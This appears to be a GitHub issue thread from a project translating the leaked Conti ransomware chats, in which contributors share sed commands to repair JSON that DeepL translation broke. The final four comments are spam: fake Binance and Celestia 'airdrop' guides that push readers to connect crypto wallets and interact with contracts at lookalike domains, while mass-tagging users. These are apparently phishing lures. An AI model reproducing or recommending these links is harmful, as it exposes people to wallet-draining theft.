### ISSUE TITLE
Deepl Issue

### ISSUE THREAD

**Issue by Nathannaelc** [TheParmak/conti-leaks-englished#8]
We discussed briefly about the Deepl messing up the formatting in #6 but it seems like Deepl translation also got messed up when translating it in JSON format.

In v2, 185.25.51.173-20220227.json line 371
Original
`  "body": "с трампом разошлись, если интересно можешь почитать переписку, тут не много"`
Translated (in full JSON), exit quotes, breaking the JSON file
`  { "body": "from": "Trump and I parted ways, if you're interested you can read the correspondence, there's not much here."`
Translated (just body)
`  "body": "we parted ways with Trump, if you're interested you can read the correspondence, there's not much here."`

**Comment by TheParmak** [comment]
I am currently working on that actually here is my current script:
```bash
#!/bin/bash
f='combine.json'
cat "$f" | sed "s/{ \"ts\":/\"ts\":/g" > "$f.2.json"
cat "$f.2.json" | sed "s/{ \"from\":/\"from\":/g" > "$f.3.json"
cat "$f.3.json" | sed "s/{ \"to\":/\"to\":/g" > "$f.4.json"
cat "$f.4.json" | sed "s/{ \"body\":/\"body\":/g" > "$f.5.json"
cat "$f.5.json" | sed 's/\\/{backslash}/g' > "$f.6.json"
sed '/^$/d' "$f.6.json" > "$f.7.json"

```

**Comment by TheParmak** [comment]
deepl also sometimes adds random special characters at the end of the line, so I need to identify and remove them that's the only issue left I assume.

**Comment by Nathannaelc** [comment]
I think it'll be easier and shorter to just find
`  { "`
and replace with
`"`

**Comment by TheParmak** [comment]
I am stupid lol

**Comment by Nathannaelc** [comment]
this should cover the { "
`sed -i 's/{ "/"/' combine.json`

**Comment by TheParmak** [comment]
okay so
```bash
#!/bin/bash
f='combine.json'
sed '/^$/d' "$f" > "$f.2.json"
cat "$f.2.json" | sed 's/{ "/"/g' > "$f.3.json"
cat "$f.3.json" | sed 's/\\/{backslash}/g' > "$f.4.json"
cat "$f.4.json" | sed 's/\"\./"/g' > "$f.5.json"
cat "$f.5.json" | sed 's/},//g' > "$f.6.json"
```
this is the current script and the only left problem I think is:

"body": "from": "Trump and I parted ways, if you're interested you can read the correspondence, there's not much here."

this one

**Comment by Nathannaelc** [comment]
Yeah, that will be the hardest one as ": " matched the "body": " as well.

I'll probably look into modifying it with jq

**Comment by TheParmak** [comment]
maybe this would work: if there is ```"word":```  more than once in a single line delete the second one

**Comment by TheParmak** [comment]
how to do that though

**Comment by TheParmak** [comment]
I'll manually change those as of they are so rare but we will need to figure out some automation later

**Comment by Nathannaelc** [comment]
for the specific case this works
`echo '"body": "from": "Trump and I
 parted ways, if you're interested you can read the correspondence, there's not much here."' | sed -E 's/"body": "(.*)":
 "/"body": "\1 /g'`
"body": "from Trump and I parted ways, if youre interested you can read the correspondence, theres not much here."

sadly, it's extremely specific

**Comment by Nathannaelc** [comment]
@TheParmak what did you want to do with recursive_prox.sh? 
FILES='file_path' doesn't really make sense to me.

**Comment by TheParmak** [comment]
you set file_path as a directories path so it recurses over all the files of it doing what prox.sh does

**Comment by TheParmak** [comment]
folder_path would be better though, lemme change it.

**Comment by Nathannaelc** [comment]
why don't you pass $1 just like prox.sh? and use prox.sh in the for loop instead 
bash prox.sh $f

**Comment by TheParmak** [comment]
I tried that but that bugs out for some reason

**Comment by TheParmak** [comment]
probably it is intended for one argument only so you can't pass the whole directory to it

**Comment by TheParmak** [comment]
@Nathannaelc do you have discord or something like that, really this is not the best way to communicate.

**Comment by Nathannaelc** [comment]
Yeah, I do have one

**Comment by TheParmak** [comment]
Would you like to give it here or should I give my handle?

**Comment by Nathannaelc** [comment]
https://privnote.com/xXvJcyTz#lM77VINkL

if it's good enough for Conti, it's good enough for me

**Comment by TheParmak** [comment]
you don't accept friend requests, enable them.

**Comment by Nathannaelc** [comment]
I did, try again

**Comment by TheParmak** [comment]
okay sent it

**Comment by TheParmak** [comment]
@Nathannaelc check discord

**Comment by Teicu** [comment]
Hi guys and thanks for the effort. What particular tool do you use to open these folders and obviously to read the messages? Thank you

**Comment by Nathannaelc** [comment]
> Hi guys and thanks for the effort. What particular tool do you use to open these folders and obviously to read the messages? Thank you

It's in JSON so you can use any text-editor you like. Heck even notepad will display it just fine.

**Comment by cutff** [comment]
each time i download i get this error, AV disabled etc... 

https://prnt.sc/59YZT93uANvj

any idea ?

**Comment by TheParmak** [comment]
You probably don't download the whole file properly, try cloning it with git cli.

**Comment by cutff** [comment]
> You probably don't download the whole file properly, try cloning it with git cli.

Thanks, works all good with git clone. Appreciated for the translation.

**Comment by TheParmak** [comment]
No problem

**Comment by softuvo** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

### 2. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 3. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

**Comment by mohamedata-code** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

### 3. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)


Winners: @superkeyor, @jzng, @MaytzgeM, @nlfiasel, @nerdyckc2, @deshi55, @montelai, @power-jun, @nealdb, @off99555

**Comment by ha0min** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[![Celestia Banner](https://miro.medium.com/v2/resize:fit:1400/1*O0la1gfWxFHTQf1ZOoT9_Q.png)](https://www.celestianetworkl.online/)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://www.celestianetworkl.online/) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!FlitX, @amiddleton162, @alexcwyu, @mccoy-trading-usa, @Andrej1988, @4rthb, @m4ttgit, @firmai, @jubbon, @rogliu, @balgithub, @psychedde1ic, @zhiwei-w-luo, @rouzbeh-afrasiabi, @yujian-syj, @gromatluidgi, @planetlibra29, @darwin403, @from1to9, @seanstone

**Comment by sabrinekhoualdi** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[![Celestia Banner](https://miro.medium.com/v2/resize:fit:1400/1*O0la1gfWxFHTQf1ZOoT9_Q.png)](https://www.celestianetworkl.online/)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://www.celestianetworkl.online/) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!zkvm, @Lxxvir, @alirazacodes, @zn66665, @ARNO-0, @jdriscoll98, @Martin-57blocks, @lane2, @webtester0, @Rask467, @basharabdullah, @0xKoda, @KevinHock, @DAZ85Z, @dendisuhubdy, @ardislu, @marthendalnunes, @RHIE-coder, @loricallum, @scammi
